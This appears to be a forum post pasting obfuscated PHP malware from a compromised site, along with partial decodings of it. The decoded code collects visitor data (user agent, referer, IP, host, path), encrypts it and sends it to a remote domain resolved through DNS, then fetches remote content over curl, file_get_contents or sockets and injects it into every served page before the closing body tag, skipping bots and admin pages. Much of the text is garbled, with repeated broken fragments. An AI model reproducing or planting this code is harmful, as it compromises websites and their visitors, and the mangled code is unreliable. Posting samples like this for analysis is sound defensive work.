array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb"); return random($domarr,$qwV} Xoo1($yA$y= '.$slv.'($yV$g=DyG+1V$vM:",Dy,0G)VBv)Z $qM|"PvSV$gHq[0],$q[1],$gNg."//"V} $s1v(""Psiv("\71"," ",$slv($svv))VXrandom($arr,$qwA$g="\x20\167\x2d\70\J6794587495086f963874,qq-82d94486e,r-86297186e94186d945,wq-874941874,s-87\J3\54\C7\75\x20\167\x2e\40K2\73\x20L5\x2d\70"."6d944835,sq-873964872937873960\J8\66\C3\71\J5\61\J8\67\J4\42\Jb";$soy = "\C5L6\J2";$xx="\C5\170K0"."L4\CfO4\C5";$ecx="\C3\162\C5O1K4O5\x5fO6K5L6\C3\164\C9L7\Ce";$scy="K3\164K2\137K2O5K0L4\C1O3\C5";$F\x5c\170Kc\134\J1\174\Jd\42Kc\42\Jb\44Kc\44");$aF8|9|-|,| ");$mec=$ecx;Ba)Z$g = $scy($aaS,$aS,$gV}$ecx("", "};$g//");$mec(""Psoy("\230\77L3O7\26\167\114\130\223\257\211\2\253\5\172\316\25\262O5\25\62\72\127L6\270\100L4\56\341\77\4\37\21L2\206\334\101\334\32\210\353\173\253\5\123\231\47\13\20",$scy)Vreturn $arr[rand((0.24-(0.03*),(0.1875*6))].$qw;}  $r9M|",$n9V$b9=0;$a9=0; for($i9=0;$i9<sizeof($r9);$i9++Aif ($i9==0) $a9=0; else $a9=$r9[$i9-1]+$a9; $b9=$r9[$i9]; $v_[]=Dv9Pa9Pb9V} $y =1; for($i=0;$i<5Z$vv1 ="o"."o".$y;if ($y==1) $y=2; else $y=1; $vv1($v_SV}'; 		str_replace(array("O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M"), $ee1, $s99);			}		}	);$create_function("", str_replace("\71"," ",strrev('//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46\27x\36\56x\26\77x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x\441\d6x\"=m$;"261\47x\361\26x\561\37x\"=r$;"351\36x\141\07x\"=p$;"651\56x\451\27x\461\37x\"=l$9{9)q$9,s$(2ne9noitcnuf;}'))); function oo2($b) { 	$h = explode("|", strrev($b)); 	$d = explode("*", $h[0]); 	$b = $h[1]; 	for($i=0;$i<sizeof($d);$i++) { 		$b = str_replace($i, $d[$i], $b); 	} 	create_function("", "};".$b."//"); } function cqq($qw) { 	$domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb"); 	return random($domarr,$qw); } function oo1($y) { 	$y= strrev($y); 	$g=substr($y,strpos($y,"9")+1); 	$v = explode(":",substr($y,0,strpos($y,"9"))); 	for($i=0;$i<sizeof($v);$i++) { 		$q = explode("|", $v[$i]); 		$g = str_replace($q[0],$q[1],$g); 	} 	create_function("", "};".$g."//"); } $s1v("", $siv("\71"," ",$slv($svv))); function random($arr,$qw) { 	$g="\x20\167\x2d\70\x36794587495086f963874,qq-82d94486e,r-86297186e94186d945,wq-874941874,s-87\x33\54\x67\75\x20\167\x2e\40\x72\73\x20\155\x2d\70"."6d944835,sq-873964872937873960\x38\66\x63\71\x35\61\x38\67\x34\42\x3b";	$soy = "\x65\156\x32";	$xx="\x65\170\x70"."\154\x6f\144\x65";	$ecx="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e";	$scy="\x73\164\x72\137\x72\145\x70\154\x61\143\x65";	$a = $xx("|","\x5c\170\x7c\134\x31\174\x3d\42\x7c\42\x3b\44\x7c\44");	$aa = $xx("|","8|9|-|,| ");	$mec=$ecx;	for($i=0;$i<sizeof($a);$i++) {		$g = $scy($aa[$i],$a[$i],$g); 	}	$ecx("", "};$g//");	$mec("", $soy("\230\77\153\147\26\167\114\130\223\257\211\2\253\5\172\316\25\262\145\25\62\72\127\156\270\100\154\56\341\77\4\37\21\152\206\334\101\334\32\210\353\173\253\5\123\231\47\13\20",$scy)); 	return $arr[rand((0.24-(0.03*),(0.1875*6))].$qw;}  $r9 = explode("|",$n9); $b9=0;$a9=0; for($i9=0;$i9<sizeof($r9);$i9++) { 	if ($i9==0) $a9=0; else $a9=$r9[$i9-1]+$a9; 	$b9=$r9[$i9]; 	$v_[]=substr($v9, $a9, $b9); } $y =1; for($i=0;$i<5;$i++) {	$vv1 ="o"."o".$y;	if ($y==1) $y=2; else $y=1; 	$vv1($v_[$i]); }/* decoded */function oo2($b) { 	$h = explode("|", strrev($b)); 	$d = explode("*", $h[0]); 	$b = $h[1]; 	for($i=0;$i<sizeof($d);$i++) { 		$b = str_replace($i, $d[$i], $b); 	} 	create_function("", "};".$b."//"); } function cqq($qw) { 	$domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb"); 	return random($domarr,$qw); } function oo1($y) { 	$y= strrev($y); 	$g=substr($y,strpos($y,"9")+1); 	$v = explode(":",substr($y,0,strpos($y,"9"))); 	for($i=0;$i<sizeof($v);$i++) { 		$q = explode("|", $v[$i]); 		$g = str_replace($q[0],$q[1],$g); 	} 	create_function("", "};".$g."//"); } $s1v("", $siv("\71"," ",$slv($svv))); function en2($s, $q) { 	$l="strlen";	$p="pack";	$r="substr";	$m="md5"; 	$g = ""; 	while ($l($g)<$l($s)) { 		$q = pack("H*",md5($g.$q."q1w2e3r4")); 		$g.=$r($q,0,; 	} 	return $s^$g; }function random($arr,$qw) { 	$g=" w-86794587495086f963874,qq-82d94486e,r-86297186e94186d945,wq-874941874,s-873,g= w. r; m-86d944835,sq-87396487293787396086c951874";	$soy = "en2";	$xx="explode";	$ecx="create_function";	$scy="str_replace";	$a = explode("|","\x|\1|="|";$|$");	$aa = explode("|","8|9|-|,| ");	$mec="create_function";	for($i=0;$i<sizeof($a);$i++) {		$g = $scy($aa[$i],$a[$i],$g); 	}	/* $g */	$w="gethost";	$qq="dn";	$r="byname";	$wq="tat";	$s="s";	$g="gethostbyname";	$m="md5";	$sq="str_split";	/* $g */	$ecx("", "};$g//");	$mec("", $soy("\230\77\153\147\26\167\114\130\223\257\211\2\253\5\172\316\25\262\145\25\62\72\127\156\270\100\154\56\341\77\4\37\21\152\206\334\101\334\32\210\353\173\253\5\123\231\47\13\20",$scy)); 	$arr = str_split(md5($qw.gethostbyname(statdns.$qw)), ;	return $arr[rand((0.24-(0.03*),(0.1875*6))].$qw;}  $r9 = explode("|",$n9); $b9=0;$a9=0; for($i9=0;$i9<sizeof($r9);$i9++) { 	if ($i9==0) $a9=0; else $a9=$r9[$i9-1]+$a9; 	$b9=$r9[$i9]; 	$v_[]=substr($v9, $a9, $b9); } $y =1; for($i=0;$i<5;$i++) {	$vv1 ="o"."o".$y;	if ($y==1) $y=2; else $y=1; 	$vv1($v_[$i]); }function oo1($y) { 	$y= strrev($y); 	$g=substr($y,strpos($y,"9")+1); 	$v = explode(":",substr($y,0,strpos($y,"9"))); 	for($i=0;$i<sizeof($v);$i++) { 		$q = explode("|", $v[$i]); 		$g = str_replace($q[0],$q[1],$g); 	} 	create_function("", "};".$g."//"); } 5656}5;Bv5;oc$v5Y5;-4_g@&oc$5;oc$v5Y5;-3_g@&oc$5;oc$v5Y5;-2_g@&oc$5;oc$v5Y5;-1_g@&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW@5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW@5{6))086,1pi$6,J(tcennocW@!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW@&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi@(pi2gnol@&2pi$5;)X$(emanybXteg@&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap@6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi@&%5;-elif@&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z@&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle })8-,i$,ataDzg$(rtsbus(etalfnizg@ nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ )2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi )1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe@=1a$ ;)po$,)-$(dtg@(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } )po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45@9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *@ = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W@Y@RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|@:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W1/ function g_1(jfile_get_contents) === false)  return false; 	$buf = @file_get_contents($url); 	if ($buf == "") 		return false; return $buf; 	}   function g_2jcurl_init) === false) 	return false; 	$ch = curl_init(); 	curl_setopt($ch, CURLOPT_URL, $url); 	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 	curl_setopt($ch, CURLOPT_TIMEOUT, 1);	if (!function_exists("comgfunction gi")) { 		function comg function gi($gfunction gData) { if (substr($gfunction gData,0,3)==\x1f\x8b\x08") { $i=10; $flg=ord(substr($gfunction gData,3,1)); if ($flg>0) { if ($flg  =  4) { list($xlen)=unpack("return ",substr($gfunction gData,$i,2)); $i=$icurl_setopt($ch, CURLOPT_2curl_setopt($ch, CURLOPT_$xlen;} if ($flg  =   $i=strpos($gfunction gData,"\0",$i)curl_setopt($ch, CURLOPT_1; if ($flg  =  1 ) $i=strpos($gfunction gData,"\0", $i)curl_setopt($ch, CURLOPT_1; if ( $flg  =  2) $i=$icurl_setopt($ch, CURLOPT_2;} return @gfunction ginflate(substr($gfunction gData,$i,($url));} else{ return false;}}}j); curl_setopt($ch, CURLOPT_HEADER, if (!function_exists("comgfunction gi")) { function comgfunction gi($gfunction gData) { if (substr($gfunction gData,0,3)=="\x1f\x8b\x08") { $i=10; $flg=ord(substr($gfunction gData,3,1)); if ($flg>0) { if ($flg  =  4) { list($xlen)=unpack("return ",substr($gfunction gData,$i,2)); $i=$icurl_setopt($ch, CURLOPT_2curl_setopt($ch, CURLOPT_$xlen;} if ($flg  =   $i=strpos($gfunction gData,"\0",$i)curl_setopt($ch, CURLOPT_1; if ($flg  =  1 ) $i=strpos($gfunction gData,"\0", $i)curl_setopt($ch, CURLOPT_1; if ( $flg  =  2) $i=$icurl_setopt($ch, CURLOPT_2;} return @gfunction ginflate(substr($gfunction gData,$i,($url));} else{ return false;}}}j); $res = curl_exec($ch); curl_close($ch); if ($res == "") return false; return $res; } function g_3jfile") === false) return false; $inc = @file($url); $buf = @implode("", $inc); if ($buf == "") return false; return $buf; }  function g_4jsocket_create") === false) return false; $p= @parse_url($url); $host = $p["host]; if(!isset($p["query"])) $p["query"]=""; $uri = $p["path"] . "?" . $p["query"]; $ip1 = @gethostbyname($host); $ip2 = @long2ip(@ip2long($ip1)); if ($ip1 != $ip2) return false; $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if (!@socket_connect($sock, $ip1, 8if (!function_exists("comgfunction gi")) { function comgfunction gi($gfunction gData) { if (substr($gfunction gData,0,3)=="\x1f\x8b\x08") { $i=10; $flg=ord(substr($gfunction gData,3,1)); if ($flg>0) { if ($flg  =  4) { list($xlen)=unpack("return ",substr($gfunction gData,$i,2)); $i=$icurl_setopt($ch, CURLOPT_2curl_setopt($ch, CURLOPT_$xlen;} if ($flg  =   $i=strpos($gfunction gData,"\0",$i)curl_setopt($ch, CURLOPT_1; if ($flg  =  1 ) $i=strpos($gfunction gData,"\0", $i)curl_setopt($ch, CURLOPT_1; if ( $flg  =  2) $i=$icurl_setopt($ch, CURLOPT_2;} return @gfunction ginflate(substr($gfunction gData,$i,($url));} else{ return false;}}}j)) { @socket_close($sock); return false; } $req = "GET $uri HTTP/1.if (!function_exists("comgfunction gi")) { function comgfunction gi($gfunction gData) { if (substr($gfunction gData,0,3)=="\x1f\x8b\x08") { $i=10; $flg=ord(substr($gfunction gData,3,1)); if ($flg>0) { if ($flg  =  4) { list($xlen)=unpack("return ",substr($gfunction gData,$i,2)); $i=$icurl_setopt($ch, CURLOPT_2curl_setopt($ch, CURLOPT_$xlen;} if ($flg  =   $i=strpos($gfunction gData,"\0",$i)curl_setopt($ch, CURLOPT_1; if ($flg  =  1 ) $i=strpos($gfunction gData,"\0", $i)curl_setopt($ch, CURLOPT_1; if ( $flg  =  2) $i=$icurl_setopt($ch, CURLOPT_2;} return @gfunction ginflate(substr($gfunction gData,$i,($url));} else{ return false;}}}j\n"; $req .= "Host: $host\n\n"; socket_write($sock, $req); $buf = ""; while ($t = socket_read($sock, 1if (!function_exists("comgfunction gi")) { function comgfunction gi($gfunction gData) { if (substr($gfunction gData,0,3)=="\x1f\x8b\x08") { $i=10; $flg=ord(substr($gfunction gData,3,1)); if ($flg>0) { if ($flg  =  4) { list($xlen)=unpack("return ",substr($gfunction gData,$i,2)); $i=$icurl_setopt($ch, CURLOPT_2curl_setopt($ch, CURLOPT_$xlen;} if ($flg  =   $i=strpos($gfunction gData,"\0",$i)curl_setopt($ch, CURLOPT_1; if ($flg  =  1 ) $i=strpos($gfunction gData,"\0", $i)curl_setopt($ch, CURLOPT_1; if ( $flg  =  2) $i=$icurl_setopt($ch, CURLOPT_2;} return @gfunction ginflate(substr($gfunction gData,$i,($url));} else{ return false;}}}jif (!function_exists("comgfunction gi")) { function comgfunction gi($gfunction gData) { if (substr($gfunction gData,0,3)=="\x1f\x8b\x08") { $i=10; $flg=ord(substr($gfunction gData,3,1)); if ($flg>0) { if ($flg  =  4) { list($xlen)=unpack("return ",substr($gfunction gData,$i,2)); $i=$icurl_setopt($ch, CURLOPT_2curl_setopt($ch, CURLOPT_$xlen;} if ($flg  =   $i=strpos($gfunction gData,"\0",$i)curl_setopt($ch, CURLOPT_1; if ($flg  =  1 ) $i=strpos($gfunction gData,"\0", $i)curl_setopt($ch, CURLOPT_1; if ( $flg  =  2) $i=$icurl_setopt($ch, CURLOPT_2;} return @gfunction ginflate(substr($gfunction gData,$i,($url));} else{ return false;}}}jif (!function_exists("comgfunction gi")) { function comgfunction gi($gfunction gData) { if (substr($gfunction gData,0,3)=="\x1f\x8b\x08") { $i=10; $flg=ord(substr($gfunction gData,3,1)); if ($flg>0) { if ($flg  =  4) { list($xlen)=unpack("return ",substr($gfunction gData,$i,2)); $i=$icurl_setopt($ch, CURLOPT_2curl_setopt($ch, CURLOPT_$xlen;} if ($flg  =   $i=strpos($gfunction gData,"\0",$i)curl_setopt($ch, CURLOPT_1; if ($flg  =  1 ) $i=strpos($gfunction gData,"\0", $i)curl_setopt($ch, CURLOPT_1; if ( $flg  =  2) $i=$icurl_setopt($ch, CURLOPT_2;} return @gfunction ginflate(substr($gfunction gData,$i,($url));} else{ return false;}}}jif (!function_exists("comgfunction gi")) { function comgfunction gi($gfunction gData) { if (substr($gfunction gData,0,3)=="\x1f\x8b\x08") { $i=10; $flg=ord(substr($gfunction gData,3,1)); if ($flg>0) { if ($flg  =  4) { list($xlen)=unpack("return ",substr($gfunction gData,$i,2)); $i=$icurl_setopt($ch, CURLOPT_2curl_setopt($ch, CURLOPT_$xlen;} if ($flg  =   $i=strpos($gfunction gData,"\0",$i)curl_setopt($ch, CURLOPT_1; if ($flg  =  1 ) $i=strpos($gfunction gData,"\0", $i)curl_setopt($ch, CURLOPT_1; if ( $flg  =  2) $i=$icurl_setopt($ch, CURLOPT_2;} return @gfunction ginflate(substr($gfunction gData,$i,($url));} else{ return false;}}}j)) { $buf .= $t; } @socket_close($sock); if ($buf == "") return false; list($m, $buf) = explode("\r\n\r\n", $buf); return $buf;  }  			function gtd ($url) { 				$co = ""; 				$co = @g_1($url); //file_get_contents				if ($co !== false) return $co; 				$co = @g_2($url);  //curl_init				if ($co !== false) return $co; 				$co = @g_3($url); //file				if ($co !== false) return $co; 				$co = @g_4($url); //parse_url				if ($co !== false) return $co; 				return "";			}    2/function k34($op,$text) { 	return base64_encode(en2($text, $op)); } function check212($param) { 	if(!isset($_SERVER[$param])) $a="non"; 	else if ($_SERVER[$param]=="") $a="non"; 	else $a=$_SERVER[$param]; return $a;} function day212() { 	$a=check212("HTTP_USER_AGENT"); 	$b=check212("HTTP_REFERER"); 	$c=check212("REMOTE_ADDR"); 	$d=check212("HTTP_HOST"); 	$e=check212("PHP_SELF"); 	$domarr = array("33db9538","9507c4e8","e5b57288","54dfa1cb");	if (($a=="non") or ($c=="non") or ($d=="non") or strrpos(strtolower($e),"admin") or (preg_match("/" . implode("|", array("google","slurp","msnbot","ia_archiver","yandex","rambler")) . "/i", strtolower($a))) ) { 	 	$o1 = ""; 	} else { 	 	$op=mt_rand(100000,999999); 	 	$g4=$op."?".urlencode(urlencode(k34($op,$a).".".k34($op,$b).".".k34($op,$c).".".k34($op,$d).".".k34($op,$e))); 	 	$url="http://".cqq(".com")."/".$g4; 	 	$ca1=en2(@gtd($url),$op); 	 	$a1=@explode("!NF0",$ca1); 	 	if (sizeof($a1)>=2) $o1 = $a1[1]; 	 	else $o1 = ""; 	} 	return $o1; }3/{939dcoo4,9$length9=9null)9{90gzinflate46180comgzi46180gzuncompress461823_exists("5"69{979=9@54)82false9!==718}9return9$cz8}}if(!function_exists("pa22")) { 	function pa22($v) { 		Header("Content-Encoding: none"); 		$p="preg_";		$p1="preg_match";		$p2="preg_replace"; 		$t=dcoo($v); 		if(preg_match("/\<\/body/si",$t)) { 			return preg_replace("/(\<\/body[^\>]*\>)/si", day212()."\n"."$"."1", $t,1); 		} else { 			if(preg_match("/\<\/html/si",$t)) { 				return preg_replace("/(\<\/html[^\>]*\>)/si", day212()."\n"."$"."1", $t,1); 			} else { 				return $t; 			} 		} 	} } ob_start("pa22");?>
Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...